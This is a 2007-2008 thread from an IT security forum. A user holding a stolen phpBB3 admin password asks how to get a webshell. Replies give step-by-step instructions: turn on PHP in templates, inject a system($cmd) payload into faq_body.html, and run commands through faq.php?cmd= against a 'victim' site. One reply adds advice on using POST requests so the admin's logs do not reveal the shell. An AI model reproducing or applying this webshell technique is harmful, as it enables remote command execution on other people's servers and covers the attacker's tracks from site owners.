Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 89
Members: 0
Total: 89
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpbb3 how to get webshell Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
phpbb3 how to get webshell
PostPosted: Fri Dec 07, 2007 1:46 am Reply with quote
akens
Regular user
Regular user
Joined: Dec 06, 2007
Posts: 22




i get a admin's pwd ,but i login it find can't get webshell
phpbb2 can upload .sql and Resume database,phpbb3 can't do it
who tell me a way?
thnx for you help!
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 1:34 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Admin panel-->Security settings Scroll down 'Allow php bla bla' put to ON.
Styles-->templates--->edit--->faq_blabla.html and put your code

<!-- PHP --> code <!-- ENDPHP -->

Then

http://victim.com/phpBB3/faq.php


Last edited by pexli on Fri Dec 07, 2007 9:41 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 2:29 pm Reply with quote
akens
Regular user
Regular user
Joined: Dec 06, 2007
Posts: 22




koko wrote:
koko wrote:
Admin panel-->Security settings Scroll down 'Allow php bla bla' put to ON.
Styles-->templates--->edit--->faq_blabla.html and put your code

<!-- PHP --> code <!-- END PHP -->


Then

http://victim.com/phpBB3/faq.php


thnx koko ,i will test!!
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 4:04 pm Reply with quote
akens
Regular user
Regular user
Joined: Dec 06, 2007
Posts: 22




I regret that I failed the test.
i change the code to c99shell,then visit faq.php,but it's not working!
Test environment:winxp+mysql5.0+php+phpbb3 v3.0.RC8

I would very much like to know that this is how the case

thnx again!
View user's profile Send private message
PostPosted: Fri Dec 07, 2007 7:53 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




c99 sucks.Only lamers use this shell.Learn to use some sample code.Like

<?php echo "$cmd" ?>
<? system($cmd) ?>

This code work much much beter than your c99 and a'm not write in my post to delete all faq_blabla.html code and put your code in there.
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 1:02 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Tested on RC8 few min ago and working.
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 2:02 pm Reply with quote
akens
Regular user
Regular user
Joined: Dec 06, 2007
Posts: 22




According to your tips,I also tested a whole day, or not achieve the desired results.Insert code has indeed been Analysis,But does not seem to include in the faq.php.Do not know what went wrong steps.
my steps:
1:Admin panel-->Security settings -->allow php templates (yes)
2:Styles-->templates--->edit--->faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
i don't delete faq_blabla.html code
3:visit http://*****.com/phpBB3/faq.php?cmd=ls
Such steps are wrong?
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 3:23 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




akens wrote:
According to your tips,I also tested a whole day, or not achieve the desired results.Insert code has indeed been Analysis,But does not seem to include in the faq.php.Do not know what went wrong steps.
my steps:
1:Admin panel-->Security settings -->allow php templates (yes)
2:Styles-->templates--->edit--->faq_body.html and put code
<!-- PHP -->
<? system($cmd) ?>
<!-- END PHP -->
i don't delete faq_blabla.html code
3:visit http://*****.com/phpBB3/faq.php?cmd=ls
Such steps are wrong?


<!-- PHP --> @system($cmd) <!-- ENDPHP -->

You know diference of method POST and GET?If admin looks in logs will see something like this GET phpBB3/faq.php?cmd=ls and your shell will be deleted.
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 4:41 pm Reply with quote
akens
Regular user
Regular user
Joined: Dec 06, 2007
Posts: 22




i test only in my localhost!
GET OR POST to get shell influential?
The question now is the key to insert the normal implementation of the code
please forgive my ignorance, I will try to find some information to supplement knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue, thank you has been to my help!
if have a video ,I think I will progress faster Razz
View user's profile Send private message
PostPosted: Sat Dec 08, 2007 9:32 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




akens wrote:
i test only in my localhost!
GET OR POST to get shell influential?
The question now is the key to insert the normal implementation of the code
please forgive my ignorance, I will try to find some information to supplement knowledge!
As a novice, the only thing I can do is to
spend a lot of time and effort to understand the issue, thank you has been to my help!
if have a video ,I think I will progress faster Razz


If "register_globals" is off, then you must access $_GET or $_POST directly anyway!
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Dec 08, 2007 9:44 pm Reply with quote
akens
Regular user
Regular user
Joined: Dec 06, 2007
Posts: 22




Test success
thnx koko and Waraxe's help!
View user's profile Send private message
PostPosted: Sun Jun 01, 2008 9:15 pm Reply with quote
siurek22
Regular user
Regular user
Joined: May 31, 2008
Posts: 13




i have problem with it when i put your code site give me error
"Parse error: syntax error, unexpected '}' in /home/zycien/domains/zfn.pl/public_html/forum/includes/template.php(175) : eval()'d code on line 1"
View user's profile Send private message
PostPosted: Mon Jun 02, 2008 1:22 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




Check the "}" are correct in the code. It seems there is one too many, or one out of place. If you have no idea what I'm talking about then post the code here and I will fix it.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Mon Jun 02, 2008 4:40 am Reply with quote
siurek22
Regular user
Regular user
Joined: May 31, 2008
Posts: 13




Code:
<!-- PHP -->
<? system($cmd); ?>
<!-- END PHP -->

i used this code and i don't know why it is that bexause in this code have any"}" :/
View user's profile Send private message
PostPosted: Mon Jun 02, 2008 6:31 am Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




siurek22 remove <? ?> from code.
View user's profile Send private message
phpbb3 how to get webshell
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds